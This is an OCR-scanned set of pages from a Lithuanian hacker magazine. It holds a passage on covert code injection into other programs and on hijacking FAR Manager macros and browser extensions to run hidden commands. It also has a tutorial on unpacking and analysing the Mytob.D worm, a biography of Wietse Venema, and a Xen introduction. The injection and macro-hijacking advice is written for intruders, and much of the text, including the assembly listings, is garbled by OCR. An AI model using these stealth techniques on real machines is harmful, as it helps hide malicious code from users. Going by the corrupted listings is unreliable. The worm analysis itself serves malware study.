3. MSBLAST — RPC DCOM 
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tex:77F82CGB ŽwPratedVirtuolMemory endp 


Nedaugelis apsaugos programų vei- 
kia tokiame žemame lygyje, todėl 
mes turime puikias galimybes likti 
nepastebėtais, tačiau... rizika vis 
tiek lieka. Ką padarysi — tokia mūsų 
profesijos specifika. Giliau leistis jau 
nėra kur! Žemiau tik branduolys! Be 
abejo, galima parašyti tvarkyklę, kuri 
išnagrinėja puslapių katalogą ir įterpia 
kodą tiesiogiai į fizinę atmintį, arba 
tą patį galima padaryti iš taikomojo 
lygio, kreipiantis į pseudojrenginį „A 
DeviceNPhysicalMemory“ , kuris iki 
pat Windows 2003 Server SP1 buvo 
prieinamas administratoriui tiek skaity- 
mui, tiek rašymui, tačiau dabar su šiuo 
pseudojrenginiu negali dirbti net Sys- 
tem, kas mus sugrąžina prie tvarkyklės 
(žr. straipsnį „Changes to Functionality 
in Microsoft Windows Server 2003 
Service Pack 1 DeviceWPhysicalMem- 
ory Object“, kurį gali rasti „Microsoft“ 
svetainėje: www.microsoft.com/tech- 
net/prodtechnol/windowsserver2003/ 
library/BookofSP1/e0f862a3-cf16-4a48-bea5-f2004d12ce35. 
mspx). Kita pašėlusi idėja — nusileisti į sektorių lygį, įsibrauti į 
pagefile bylą ir šiek tiek „pataisyti“ programą. Bet juk tai kliede- 
siai! Yra kur kas elegantiškesnių ir labiau nepastebimų saugaus 
įsiskverbimo metodų! 
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[Mūsų metodai] Mums juk nesvarbu, į kokią programą įsiskverbti, 
tiesa? Mes norime apšvarinti svetimus resursus. Daugelis programų 


se: 


IebpeIniaseikddirėss] 


var Bl, ix 
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/5! WriteProcessMemory 
iš tiesų yra ZwProtectVirtualMemory „apvalkalas“ 


pripažįsta įskiepius ir kitokias praplėtimo formas. Pakanka į tam 
tikrą katalogą įkelti modulį arba šiek tiek pataisyti konfigūracinę 
bylą (sisteminį registrą). Programa užkraus mūsų įskiepį kaip savą 
ir mes atsidursime svetimoje adresų erdvėje, kurios ribose galima 
daryti ką tik nori. Kitas galingas liaudies ginklas — makrosai. FAR 
juos saugo registre ir leidžia pakeisti bet kokią, net ir užimtą klavišų 
kombinaciją. Jis taip pat leidžia makrosams slopinti 
išvedimą į ekraną. Ką tai reiškia? Ogi štai ką! Paimkime 
kombinaciją, kuri naudojama kiek įmanoma dažniau 
(pavyzdžiui, <Alt>+<F1>, skirta disko pasirinkimui 
kairėje programos dalyje), ir priskirkime jai tam tikrą... 
„naudingų“ veiksmų (nebūtinai destruktyvių) seką, 
0 po to iškvieskime tikrąjį šiai kombinacijai priskirtą 
funkcionalumą, kad vartotojui neiškiltų jokių įtarimų, 
jog čia kažkas ne taip. Kadangi FAR suteikia priėjimą 
prie visų komandinės eilutės komandų, makrovirusų 
galimybės pasirodo besančios iš tiesų beribės! Aptikti 
pašalinius makrosus labai sudėtinga, nebent special- 
iai jų ieškotum, tačiau tam prireiks įdiegti papildomą 
įskiepį, kuris makrokomandas atvaizduoja „natūraliu“ 
pavidalu, nes priešingu atveju aš ir pats visame tame 
pasimesčiau. O ką galima pasakyti apie įžymųjį Lapiną 
(FireFox)? Tai tikros hakeriams gotams skirtos kapinės! 
Imk ir hakeriauk, tai yra įdieginėk savo praplėtimus. 
Tokius praplėtimus lengva aptikti tiesiog peržiūrėjus 
jau sukonfigūruotų praplėtimų sąrašą, tačiau toli 
gražu ne kiekvienas vartotojas gali užtikrinai pasakyti, 


/6/ Marko Rusinovičiaus Exploreris 
atvaizduoja procesų hierarchiją ir suseka „procesus-z0mbius“ 


kada ir kokius praplėtimus jis įdieginėjo. Paskutinės 
Opera versijos taip pat pripažįsta mini programų tipo 
praplėtimus, kurių niekas nekontroliuoja. 
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Lytinis organas. 
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piutenus 


IMPLANT 


Pats sau antivirusas 

Kirmino „Win32.Mytob.D“ 
išpakavimas ir analizė 

PASTARUOJU METU TARP VIRUSŲ 
KŪRĖJŲ PASTEBIMA NAUJA TENDEN- 
CIJA: JIE SAVO PARAZITUS APSAUGO 
ĮVAIRIAUSIAIS PROTEKTORIAIS, KAD 
KASPERSKIO LABORATORIJOJE SPECIAL- 
ISTAI NESUPRASTŲ, KAIP VEIKIA VIRU- 
SAS. TAČIAU MUDVIEJŲ TAI NESULAIKYS. 
SIANDIEN MES IŠPAKUOSIME MYTOB.D 
IR IŠSIAIŠKINSIME, KAIP JIS FUNKCION- 
UOJA. 


SCENA HACK 


UNIXOID 


[Parazitas] Paimkime, pavyzdžiui, gana populiarų žvėrį 
Mytob.D. Ir ką gi tu darysi, kai toks paklius tau į rankas? 
Melsiesi antivirusui? Tai ne mūsų metodai, jaunuoli! 
Jį reikia savomis priemonėmis išskrosti, ištyrinėti ir 
pašalinti iš sistemos. Tačiau pasyviu disasembliavimu 
čia neapsieisi. Atsakydama į jai sušertą kirminą, /DA 
Pro tau neišspjaus nieko aiškaus. Šiuo atveju taip yra 
todėl, kad virusas buvo ilgai ir stropiai pakuotas bei 
apsaugotas. Laimė, mes žinome, kaip elgtis tokiose 
situacijose: kraunam PEiD. 
Pasirausęs savo signatūrų bazėje, šis nuostabus įrankis 
mums pateikė išorinio apsaugos sluoksnio pavadinimą: 
yoda's Protector 1.3 -> Ashkbiz Danehkar. Tiesą sakant, šį 
protektorių tiesiog dievina įvairių kenkėjų kūrėjai. Pažiūrėk, 
ką apie jį rašo: 
- pripažįsta daugelį PE bylų formatų; 
— mažas distributyvo dydis; 
- greitas veikimas; 

polimorfinis šifravimas; 
— CRC sumų patikrinimas; 
— API funkcijų peradresavimas; 


CODING 


UNITS 


Jeigu tu Išpakarai 


tšk 


Sunaikiti proceso Wd 
masė Ir pašalnti tylą 
CAMNDOWSIsystem32i 


Lygusis raumuo 
papildomi netinklo moduliai 
pašto perėmimas. įrankių 
skydelių įdiegimas 


Pagrindinis kūnas 
Vienas ar kitas tinklo funkcijas 
atliekantis modulių rinkinys 
(socks servens, s9am modulis, 
DDOS modųjlis 


PE antraščių pašalinimas; 
antiderintuvas. 


Ir visa tai reikia išsiaiškinti, tačiau tai dar ne viskas. Atidžiau 
pažiūrėjus į sekcijų pavadinimus (UPXO, UPX1, UPX2, yC) galima 
padaryti vieną nelabai paguodžiančią išvadą. Po yoda gyvena UPX. 
Ok, nėra problemų, susitvarkysime ir su juo. Prisimename apsaugų 
pašalinimo pagrindus ir imamės darbo. 

1. Surandame originalų įėjimo tašką (Original Entry Point — OEP); 
2. Gauname programos turinį (dump); 

3. Atstatome importo lentelę. 

Originalaus įėjimo taško suradimas 

Pirmas dalykas, ką mes turime padaryti — tai surasti supakuoto 
kirmino ERP, o tada jau ir paties kirmino OERP Tikiuosi, kad pas 
tave jau yra įdiegtas nuostabusis OllyDbg. Paleidžiame jį ir jo 
padedami atidarome kirminą. Stop! Vos nepamiršau. Visus 
eksperimentus siūlyčiau atlikinėti virtualioje mašinoje, kadangi 
aktyvi viruso kodo analizė (t.y. su paleidimu) gana pavojinga. 
Taigi derintuvas paprašys išanalizuoti bylą — spaudžiame „Ne“. 
Derintuvo kursorius įsikūręs čia, ties EP: 


00418060 PUSH | EBP 
00418061 MOV EBP ESP 
00418063 PUSH | EBX 
00418064 PUSH | ES| 
00418045 PUSH EDI 
00418066 PUSHAD 


Praktiškai visi išpakuotuvai prieš pradėdami savo darbą 
steke su komanda PUSHAD išsaugo visas registrų reikšmes, 
o pabaigę savo darbą juos atstato su komanda POPAD. Tai 
reiškia, kad žemiau reikia surasti komandą POPAD ir ties ja 
sukurti breikpointą. Jeigu mes pradėsime programos trasavimą 
arba tiesiog ją paleisime su F9, tuomet suveiks išimtis, dėl ko 
derintuvas arba pateiks klaidą, arba paprasčiausiai užsidarys. 
Priežastis slypi išpakuotuve: jis gauna informaciją apie tai, 
kad programa šiuo metu yra derinimo (debug) režime. Čia 
esminė yra Windows funkcija IsDebuggerPresent. dėl kurios 
išpakuotuvas mus ir aptinka. Jeigu aptinkamas derintuvas, ši 


Platusis žiedas 
duomenų Iresursų) saugykla. Paruoštos bibllotekos 
saugomos Wykdomos bylos viduje (dažniausiai tai įrankių 
skydeliai) 


funkcija grąžina vienetą, jeigu jo nėra — grąžinamas nulis. 
Komandinėje OllyDbg eilutėje įvedame bp IsDebuggerPresent 
ir spaudžiame „Enter“. Jeigu pas tave komandinė eilutė nėra 
aktyvuota — spausk Alt +F1. Telieka paleisti programą ir tikėtis, 
kad breikas suveiks. Kaip bebūtų keista, jis suveikė, ir mes 
atsiduriame čia: 


7(812603 MOV EAXOWORD PTR FS:[18] 
812609 MOV EAX,DWORD PTR DS:[EAK-- 30] 
NB12E0C MOVZX EAX,BVTE PIR DS:[EAX 12] 
7612E10 RETN 


Su F8 keliaukim iki RETN. Pažiūrėk: registro EAX reikšmė lygi 
vienetui tai funkcijos IsDebuggerPresent darbo rezultatas, kas 
reiškia, jog derintuvas aptiktas. Derintuve spustelėk EAX registrą 
ir Mietoje vieneto čia įvesk nulį. Tada iš funkcijos gali išeiti (spausk 
FS), Išejai? Žiūrim toliau — matom koda: 


0041888C JE SHORT Mytob.00418890 
0041B88E POPAD 
0041888F RETN 


Įdomi vieta. Jeigu derintuvas aptiktas, tuomet pereiname į komandą 
POPAD, kur dirbtinai sukuriama išimtis, kadangi POPAD suveikia 
anksčiau laiko! Vis dėlto mes apgavome protektorių, todėl ramiai 
peršokame šiuos spąstus. Dabar toliau ieškokime POPAD'ų. Iš 
karto pasakysiu — jį rasi maždaug 40 eilučių žemiau. 


0041B6F9 POPAD — sukuriam breikpointa 
0041B3FA JNP SHORT Mytob.0041 B8FE 
0041 B8FC INT 1 

0041 B8FE REIN 


Pažiūrėkime dar žemiau: 


00418975 POPAD sukuriam  broikpoinią 
00418976 PUSH EAX 

00418977 XOR FAX, EAX 

00418979 PUSH DWORD PTR FS:[EAK] 
0041897C MOV DWORD PTR FS:[EAX],ESP 
0041897F JMP SHORT Mytob.00418982 


Kaip matai, aš ties dvejais surastais POPAD iškvietimais sukūriau 
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breikpointus. Padaryk tą patį ir paleisk programą. Olly sustojo ties 
0041B975, o toliau (00418982) eina komandos, kurių nebuvo, 
kuomet mes žiūrėjome į kodą po sustojimo ties IsDebuggerPresent 
(EP paslepiantis polimorfinis UPX kodas)! Komanda POPAD jau 
suveikė, o tai reiškia, kad kažkur šalia turėtų būti mums reikalingas 
perėjimas. Pasivaikščiokime su F8 ir pažiūrėkime, kas bus toliau. 
Adresu 0041B982 įvyksta išimtis, praeiname pro ją su Shift+F8 
ir patenkame į sisteminę biblioteką ntdll: 


90EAFO MOV EB DWORD PTR 55:[ESP) 
TC90EAF3 PUSH EO 

TOOEAF4 PUSH EBX 

TC90EAF5 CALL ntdl.700377C1 
9OEAFA OR ALAL 

TC90EAFC JE SHORT mdll.7C90EB0A 
C90FAFE POP EBX 

7C90EAFF POP EO 

7C90EB00 PUSH 0 

7C90EB02 PUSH EO 

TC90EBO3 CALL nidl.ZwContinue 


Pasakysiu iš karto: jeigu su F8 praeisi CALL (7C90EB03), tuomet 
programa pasileis, o tai reiškia, kad mes prieisime iki adreso 
7C90EB02 (FS) ir pažiūrėsime į steko turinį. Jeigu tu nežinai, kas 
tai yra, tuomet tau dar ankstoka skaityti šį straipsnį. Ieškosime 
adreso, kuris būtų mažesnis už protektoriaus EP (00418060). 
Peržiūrėsime apatinį dešinį Ollv langa (steką): 


0012F07C 70910738 nidl.7C910738 
0012FD80 FFFFFFFF 

0012F084 20008332 

0012FD88 7090E894 ntdll.KiFastSystenCallket 
0012FD8C 0012FF80 

0012f090 00000000 

0012f094 0012FFC0 

0012F098 00419910 Mytob.00419910 
0012f09C 00000018 

0012F0A0 00010246 UNICODE „HOST CHECL-NO" 


šis adrosos mums tinka! 


Taigi sulyginame: 


00419910 
00418060 


mūsų surostūs adlesūs. 
— piolekioriaus EP, 
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Commandbp IsDebuggerPresent 


[Beakosintai kernel? IaOebungs: Present 

1 OllyDbg 

tap veikia derntuvo aptikimas 

Un, aš jau ties UPX EP! Tu dar ne? Tuomet greičiau ties 00419910 
sukurk breikpointą (bp 00419910), spausk Enter, tada F9, ir tu 
jau su manimi. Jeigu pamatysi krūvą nulių, spausk Ctrl+-A — Olly 
išanalizuos kodą ir tau pateiks jį skaitymui patogiu pavidalu. Čia 
jau viskas paprasta: tereikia išpakuoti UPX. 


00419910 PUSHAD — esime čia 

00419911 MOV ESI,Mytob.0040F000 

00419916 LEA ED,DWORD PTR DS-[ES] + FEFF2000) 
0041991C PUSH EDI 

00419910 OR EBPFFFFFFFF 

00419920 IMP SHORT Mytoh.00419932 


Irvėl mums pažįstama komanda PUSHAD! Dabar judame aukštyn, 
kol nepamatysim: 


00419A67 POPID 

00419A68 IMP Myob.0040A0E8 <= lai „kimino“ OEP 

O0419A40 ADD BYIE PTR DS, EAKJAL <- daugybė šių alučių neleis sukti! 
00419A6 ADD BYTE PTR DS-[EAY]AL 


Ties POPAD 00419A67 sukonfigūruojame breikpointą, spaudžiam 
F9 ir dar du kartus F7. Viskas. Mes atsiduriame ties „kirmino“ OER 


Užsirašyk jo reikšmę (mano atveju tai 0040A0EB). 


[Programos turinys (dump)] Čia mes pasinaudosime programa PE 
Tools. Prieš gaudami programos turinį, šiek tiek pakonfigūruokime 
pačią programą. Užeik į programos Options. Task Viewer skyde- 
lyje varnelė turėtų būti uždėta tik ties „Full dump: Fix Header“. 
Luktelėsiu, kol tu tai padarysi (aš tai jau padariau), ir važiuojam 
toliau. Iš procesų sąrašo išsirenkame kirminą -->, kontekstiniame 
meniu spaudžiame Full Dump. Manau, nesklandumų įvedant by- 
los pavadinimą gali iškilti tik berankiams:). Iš pradžių reikia šiek 
tiek optimizuoti duomenis. Kaip tu jau žinai, mūsų protektorius 
pakeitė visų sekcijų pavadinimus, tačiau čia viskas suprantama: 
pirmos dvi sekcijos — tai protektoriaus kodo ir UPX išpakuotuvo 
sekcijos, likusios — normali programa, kuri čia tiesiog pervadinta, 
Nueiname į meniu Tools=>PE Editor ir nurodome „kirminą“. Dabar 
išpjaustysime nereikalingas protektoriaus ir pakuotuvo sekcijas, 
apie kurias aš ką tik kalbėjau. Matai mygtuką Sections? Spausk 
ji ir išpjauk dvi apatines sekcijas, kurios vadinasi UPX2, yC — tai 
gali padaryti su meniu esančiu mygtuku Kill section (from file). Stai 
mesir vėl kartu. Po žemiau aprašyto importo atstatymo galima pa- 
daryti rebuild (mygtukas rebuild pe), toliau optimizuojama bylos PE 
antraštė, kas bylos dydį gali sumažinti keletu kilobaitų, be to, tuo 
pačiu optimizuojamos vidinės struktūros ir duomenų išsidėstymas 


byloje. Rebuild taip pat galima pasinaudoti bylos atstatymui po 
protektarių ir pakuotuvų išpakavimo.. 

Importo atstatymas 

Importą mes atstatinėsime su viena puikia programa — Import 
Reconstructor. Po paleidimo procesų sąraše surask mūsų „kirminą“ 
(jeigu jau viską uždarei, teks rankiniu būdu paleisti reikiamą bylą: 
C:WINDOWS|system32 |wfdmgr. exe). 

Dabar mes turime nurodyti RVA OEP (pas /mpRec tai tiesiog 
OEP). Čia formulė paprasta, kaip int 21h „RVA OEP = VA 
OEP - ImageBase“. Tai reikia mokėti mintinai! Image Base yra 
tame pačiame PETools, pagrindiniame lange. Mūsų atveju RVA = 
01006420 -01000000 = 6420. Šią reikšmę įvedame į OEP lauką 
Ir spaudžiame mygtuką IAT AutoSearch (t.y. automatinė paieška). 
Programa suras nuorodas į importo lentelės funkcijas, po to mes 
nuspaudę mygtuką „Get Imports“ gausime pačią lentelę. Mes tur- 
ime pamatyti eilutes su funkcijomis ir priešais pateiktu užrašu YES. 
Jeigu viskas gerai, o taip ir turi būti, tuomet mygtukas Fix Dump 
mus nukreips tiesos keliu. Pasirodžiusiame lange nurodyk mūsų 
dump ą (programos turinį) — ir voila. Viskas paruošta! 


[Anatomijos pamoka] O kas toliau? Dabar pradedame 
tyrinėjimus. Kaip matai, priešais mus — nuogas virusas. 
Jeigu netiki, paleisk PEiD. Reikėtų pastebėti, kad iki šiol mes 
užsiiminėjome krekingu, t.y. išpakavome bylą ir pašalinome 
apsaugą. Dabar pereisime prie reverse-engineering'o. Reversas 

toli gražu ne krekingas. Tai fundamentalesnė sąvoka, kurios 
esmė — programos darbo supratimas, remiantis disasembliuotu 
listingu. Dabar mes į visą šį reikalą nesigilinsime, kadangi mums 
Įdomūs tik tam tikri niuansai: kaip egzistuoja virusas, ką jis 
veikia ir kur gyvena sistemoje. Be abejo, yra daugybė antider- 
inimo gudrybių, tačiau šiuo atveju ne viskas taip paprasta. Visų 
pirma, importo lentelėje yra darbo su tinklu funkcijos. Iš pradžių 
eina darbo su bylomis funkcijomis — būtent jas mes iš pradžių 
ir aptarsime. Sukurkime breikus ties 
CreateFile ir CopyFile. Paleidžiam! Prieš 
save matom labai gerą eilutę: 


004078A4 FFI5 24114100 CAIL DWORD PTR 
05:[< 8kemel32.LopyfileA>- >; kemel32.CopyFileA 


1 


Pažiūrėję į steką galime pamatyti naują 
bylos pavadinimą: NewFileName = 
„C:|WINDOWS|system32|wfdmgr. exe“. 
Dabar aišku: virusas tikrina, kur jis yra, 
ir jeigu jis ne sisteminiame kataloge, 
tuomet į ji kopijuoja save. Toliau eina 
aukščiau nurodytos bylos paleidimas 
ir pradinio proceso užbaigimas. Norint 
pratęsti tyrimą, reikia virusą apgauti. 
Galima jį nukopijuoti ten, kur jis prašo, 


SEL RE as kė aaa 


EBS 


Maro iais 


priteršia sisteminiame registre. O, matau, jog tu jau įsivažiavai ir 
sukūrei breiką ties RegOpenKey! 


00403F50 51 PUSH EO 

00403751 48 19000200 

00403F96 GA 00 PUSH 0 

D0403F98 52. PUSH EDX 

00403F99 68 01000080 

00403F9E FF15 08104100 
advapi32 RegOpsnkeybd 


PUSH 20019 


PUSH 80000001 
CALL DWORD PTR DS:[-< Badvapi32.RegOpenkey >; 


Aha, funkcija yra, žiūrim į steką: 
O0E7FE44 80000001 


O0E7FE48 00E7FE60 
Name“ 


|hley = HKEI CURRENT USER 
|Subkey = „SofiwaroWicrosofNWVABWAB4Wab File 


O0E7FEAC 00000000 | Resavad = 0 
00E7FE50 00020019 |Accoss — KE! READ 
O0E7FE54 00E7FE58 NpHandle = 00E7FE58 


Ar tau reikia aiškinti, kas vyksta šiuo metu? Kirminas ieško 
WAB bylų. Juk tai Outlook adresų knygelių bylos! Būtent, 
kirminas gauna visus pas tave surastus elektroninio pašto 
adresus ir jais išsiuntinėja save. Toliau jau paprasta: viską 
darome analogiškai, todėl čia aš nerašysiu apie visas likusias 
funkcijas. Tačiau mes praleidome kirmino darbą su tinklu... 
Atleisk, tačiau į šį straipsnį išsami analizė jau netilpo. Manau, 
kad namie tu visa tai galėsi pats lengvai išanalizuoti. Mes su 
tavimi išdirbome veiksmų schemą. " 

Taigi per 15 minučių mes atlikome paprasčiausią analizę, Šaunu, 
tiesa? Dar 15-20 minučių tokiais tempais — ir virusas bus galu- 
tinai nukenksmintas. Galbūt būtų laikas įkurti nuosavą antivirusų 
laboratoriją? 


tačiau galima paprasčiausiai apeiti 


patikrinimo funkciją čia jau kaip tu 
pageidauji. Aš pats jį nukopijavau. Taigi 
važiuojam toliau — DeleteFile. Ką gi 
Jis pašalina? Suradai, ar pasufleruoti? 


Su pirma funkcija jis pašalina C:|WIN- 
DOWS|system32|msnmsgr. exe, tada 
kopijuoja save į šį katalogą ir atidaro 
soketą (susijungimą). Be to, kirminas 
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„PROGRAMŲ BE KLAIDŲ NEBŪNA. LABAI PASISTENGĘS AŠ GALIU JŲ SANTYKI 
SUMAŽINTI IKI VIENOS KLAIDOS TŪKSTANČIUI EILUČIŲ KODO. ŠIANDIEN POSTFIX MTA 
TURI 50 TŪKSTANČIŲ KODO EILUČIŲ. MANAU, JOG KOMENTARŲ ČIA NEBEREIKIA". 


Trumpa biografija 

Wietse Zweitze Venema (čia gali išgirsti, kaip tariasi jo 
vardas: http://www.porcupine.org/wietse/wietse.wav) 
gimė Danijoje 1951 metais. Dar prieš mokyklą išmoko 
rašyti ir skaityti, todėl žymią savo vaikystės dalį praleido 
skaitydamas. Pabaigęs mokyklą įstojo į Groningeno 
universitetą, kur studijavo fiziką ir gavo daktaro laipsnį. 
Tada pradėjo dirbti sistemų architektu matematikos ir 
kompiuterių mokslų fakultete, Eindhoveno universitete. 
8 iš 12 ten praleistų metų Vycė užsiiminėjo automat- 
iniam EDI (Electronic Data Interchange) pranešimų 
transliavimui skirtų įrankių rašymu. Jo programos 
sąveikavo su pačiais įvairiausiais įrenginiais, čia bet kok- 
ie nesklandumai su aparatūra galėjo sukelti sutrikimus 
programose. Dėl to Vycė turėdavo įvertinti kiekvieną 
smulkmeną — tai jam davė didelę patirtį rašant mak- 
simaliai saugų kodą. 1996 metais jis emigravo į JAV 
ir pradėjo dirbti IBM Thomas J. Watson tyrimų centre, 
kuriame dirba ir šiandien. 


[„TCP Wrapper“ ir kiti Vycės projektai] 

[Postfix] Pašto sistema, išgarsinusi Vycę, buvo plan- 
uojama kaip populiaraus Sendmai! alternatwa. Vycė ja 
išoriškai padarė maksimaliai panašią į Sendmail, tačiau 
viduje tai buvo visiškai kita programa: greitesnė, lankstesnė 
ir saugesnė. Iš pradžių sistema buvo pavadinta VMailer ir 
pirmą kartą pristatyta publikai 1998 metais, tačiau po to 
Ji buvo pervadinta į Postfix. 


[SATAN] Security Administrator Tool for Analyzing Net- 
works — plačiai išgarsėjusi programa, kurią Vycė parašė 
kartu su Denu Farmeriu (Dan Farmer). Ji buvo skirta 
automatiniam informacijos surinkimui apie nutolusią 
sistemą. SATAN buvo apibūdinama kaip patogi admi- 
nams skirta programa, tačiau iš karto po išleidimo ja 
apsiginklavo visi hakeriai. Tai buvo pirmas patogus tinklo 


skeneris su patogia vartotojo sąsaja, todėl 1993 metais, kai jis 
pirmą kartą pasirodė internete, SATAN buvo laikomas geriausiu 
šios rūšies įrankiu. 


[The Coroner's Toolkit] TCT — dar vienas Venemos ir Farmerio 
bendradarbiavimo produktas. TCT — tai naudingų programų rink- 
inys Unix sistemos analizei po jos nulaužimo. Pirmą kartą TCT buvo 
pristatytas 1999 metų rugpjūtį, kompiuterinių įkalčių surinkimo 
metodų seminare. 


[Portmap] Portmapper turi įdiegtą priėjimo kontrolę, kuri hakeriams 
apsunkina RPC demonų atakas. 

[TCP Wrapper] Nedidelis įrankis, atliekantis Unix ugniasienės 
funkcijas (ieinančių paketų stebėjimas, priėjimo teisiu tikrinimas 
ir t.t.) 


Vycė taip patyra parašęs keletą plačiai žinomų security dokumentų: 
„Merfio dėsniai ir kompiuterių saugumas“ (Murphy's law and com- 
puter security) bei kartu su Denu Farmeriu parašytas straipsnis 
„Kompiuterio saugumo padidinimas jį nulaužiant“ (Improving the 
Security of Your Site by Breaking Into It). 


[Hobis] Laisvu laiku mėgsta pasivaikščiojimus ir pasivažinėjimus 
dviračiu kartu su savo žmona Anita po gražias Niujorko vietas. 


[Apdovanojimai] Daktaras Vycė Venema už savo dideli indėlį 
į Unix ir atvirų sistemų vystymą yra gavęs keletą prestižiškų 
apdovanojimų. 

Tarp jų: 

Security Summit Hall of Fame Award, 

SAGE Outstanding Achievement Award, 

NLUUG Award 


„Pagrindinė programų kūrėjo problema — patobulinti programą, 
tuo pačiu nesukuriant papildomų problemų“ 


„MANĘS DAUG KARTŲ KLAUSĖ, AR TCP WRAPPER ĮRANKYJE YRA KLAIDŲ, KADANGI 
JIS ILGOKAI NEBUVO ATNAUJINTAS. AŠ VISADA ATSAKAU, KAD ŽINOMŲ KLAIDŲ NĖRA, 


BŪTENT TODĖL NĖRA IR ATNAUJINIMŲ“. 


STEMOS NEGALIN 


KYLES. JE 
PRADZI!L 
AMA KAIP AP 
4, JI NIEKADA 


[Kuo užsiima dabar] Po to, kai 2002 metais Vycė Venema paliko 
FIRST (Forum of Incident Response and Security Teams) vadovo 
postą, jis daugiau laiko pradėjo skirti programavimui IBM tyrimų 
centre. 

2004 metals Vycė kartu su Denu Farmeriu parašė knygą „Įkalčių 


atskleidimas“ (Forensic Discovery), kurioje pasakojama apie tai, 
kaip išstudijuoti savo sistemą, kuri buvo nulaužta, kaip aptikti hak- 
erio buvimo joje įrodymų ir esant galimybei jį susekti. Šiuo metu 
Vycė Venema yra laikomas vienu geriausių pasaulyje kompiuterių 
saugumo ekspertų. 
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Virtualizacijos menas 
Naudojame emuliatorius buityje | 
ĮSIVAIZDUOK TOKIĄ SITUACIJĄ: TU SĖDI 
FREEBSD SISTEMOJE IR GREP'INI 
SAVO ASMENINIO NAMŲ FTP SERVE- 
RIO LOGUS TIKĖDAMASIS, KAD PIKTIEJI 
HAKERIAI NEĮSIBROVĖ Į MAŠINĄ PER 
NEUŽLOPYTĄ PROFTPD SKYLĘ. PABAIGĘS 
ŠIĄ PROCEDŪRĄ IR NEPASTEBĖJĘS NIEKO 
ĮTARTINO, TU, PASINAUDOJĘS PAPRASTA 
KLAVISŲ KOMBINACIJA, PERSIJUNGI Į 
SLACKWARE LINUX, ĮSIJUNGI MUZIKĄ IR 
PRADEDI ATRINKINĖTI PER NAKTĮ ATĖJUSĮ 
PAŠTĄ. TAI DARYDAMAS TU PRISIMENI, 
JOG NORĖJAI ATNAUJINTI SAVO ANTRĄJĮ 
LINUX DISTRIBUTYVĄ, PERSIJUNGI Į 
GENTOO, SURENKI „EMERGE--SYNC“ IR 
SUGRĮŽTI ATGAL Į SLACKWARE. PASAKA? 
ANAIPTOL! NAUDODAMASIS VIRTUALIŲ 
MAŠINŲ MONITORIUMI XEN, TU GALĖSI 
OPERACINĖMIS SISTEMOMIS VARI- 
JUOTI NE BLOGIAU, NEI CIRKO ARTISTAS 
ZONGLIRUOJA KAMUOLIUKAIS. 


[Xen: bendri duomenys] Xen sukūrė Kembridžo univer- 
siteto tyrimų grupė projekto Xenoserver rėmuose (pasta- 
rasis skirtas paskirstytų skaičiavimų organizacijai). Pirmoji 
vieša versija — 1.0 (buvo išleista 2003 metų spalį), šiuo 
metu kuriama versija — 3.0. Komercinio Xen palaikymo 
ėmėsi kompanija „XenSource“ (Www.xensource.com), 0 
projekto dalyvių sąraše gali rasti tokių gigantų, kaip „Intel“, 
AMD, IBM, HR „Novell“ ir „RedHat“. 

Mes aptarsime Xen įdiegimo ir naudojimo ypatybes, tačiau 
iš pradžių tradiciškai šiek tiek teorijos. 


[Žiedų valdovas] Šiuolaikinių technologijų pasaulyje 
dažnai galima stebėti tokį reiškinį, kuomet nuo idėjos 
atsiradimo iki masinio jos pritaikymo pradžios praeina 
įspūdingas laiko tarpas. Išimtimi netapo ir virtualių 
mašinų monitoriaus idėja, kurią daugiau nei prieš 30 
metų pasiūlė ir realizavo kompanija IBM programinio 
paketo VM/370 pavidalu. Xen kūrėjai pakartojo IBM 
programuotojų „žygdarbį“. Užuot realizavę virtualią mašiną 
virš egzistuojančios OS (ryškiausi pavyzdžiai: VMWare, 
gemu; išsamiau apie gemu skaityk žemiau), jie virtua!- 
izacijos kodą įkurdino pačioje operacinėje sistemoje. Xen 
veikia su „plika“ geležim, o visos operacinės sistemos 
paleidžiamos virš Xen sukurtos virtualios mašinos. Tokia 
architektūra leidžia pasiekti iš tiesų unikalias greitaveikos 
charakteristikas (pagal kai kuriuos virš Xen veikiančio Linux 
įvertinimus, jo sparta nuo native Linux atsilieka viso labo 
3 procentais!) Tačiau kaip gi tai pavyko? 


Manau, tu žinai, kad x86 (IA-32) architektūros procesoriai, veik- 
dami apsaugotame režime, naudoja keturis atminties apsaugos 
lygius (vadinamieji žiedai: rings 0-3). Šiuolaikinės operacinės 
sistemos naudoja tik du iš jų: ring O labiausiai privilegijuotas 
lygis, jame pasileidžia OS, ir ring 3 — ne toks privilegijuotas lygis, 
naudojamas vartotojo lygio programoms paleisti. Taip programų 
kodas nuo 3 lygio neturi priėjimo teisių prie O lygio adresų erdvės 
ir negali sutrukdyti OS veikimui. Xen kūrėjai nuėjo toliau, nusprendę 
savo poreikiams panaudoti 1 ir 2 lygius. 

Pats Xen, kitaip dar vadinamas hipervizoriumi (hypervisor), pasileidžia 
O lygyje, operacinės sistemos dabar veikia 1 lygyje, o vartotojiškos 
programos, kaip ir priklauso, veikia 3 lygyje. Be to, Xen veikimui 
reikia vadinamojo supervizoriaus (supervisor) ir operacinė sistema, 
kurios tvarkykles priėjimui prie aparatūros naudos viešinčios (guest) 


ATA TTT SS ————————— 
PIO tash tabže entries: S42 (order: 9, 8192 bytes) 

Nen reported: 1837.505 MZ pr 

bentrų cache hash tadie entnu : 4, 45505 butes) 

Inode-cache hash table entries: 8152 (order: 3. 32168 bytes) 

vmaLioc area: CB000000-10fF5000, maxmen 340000. 

Nenori: 1099284/120832 avallanie 14854 Kerne! code, 24124 Paserved, 381K date, 324 1 
mit, Ok Nighnea) 

Dveckinę (f this processor honaurs the KP bit even in superviser made... OK- 
Hount-cache hash table entries: 512 


GPU: A Easpranita) | 26001 stepping 01 
Erabling fast FPU save and restorė... done. 
ingas) 60 SIMO FPU except Lūn support. done. 


initiaiizes 
14 Cryptogranhic API 

Is scheduler noop registered 

10 scheguler ant cipatarų registered 

15 seheduler Geadlino rešisteneo 

io scheduler cią registered 

ten virtusi console successfulių Installed as 1tyL 

Event-charnel device nstai led. 

rettront: Initlalizing virtuai ethernat dr ver. 

Registering Dick device major 3 

Gkilce-marger: 4.4.0-inct1 (2005-01-12) Initlalizėd: da-develOredhat co 
MT 

1 


registered protocoi family = 
rauting cache hash table a' 512 buckets. akbytės 

established hash table entries: 4096 (order: 3, 32768 burės) 
TIE bind hash tabla entries: a096 (order: 2, 16984 bytes) 

TiP: Kas Tabies cant Igured (estab)ished 4096 bind 4036) 

KET: Registered protocol family I 

NET: Registered ppotocoi tamilų 17 

EliS-is: INFO: recoveru renuired on resdonių f Ilesųsten. 


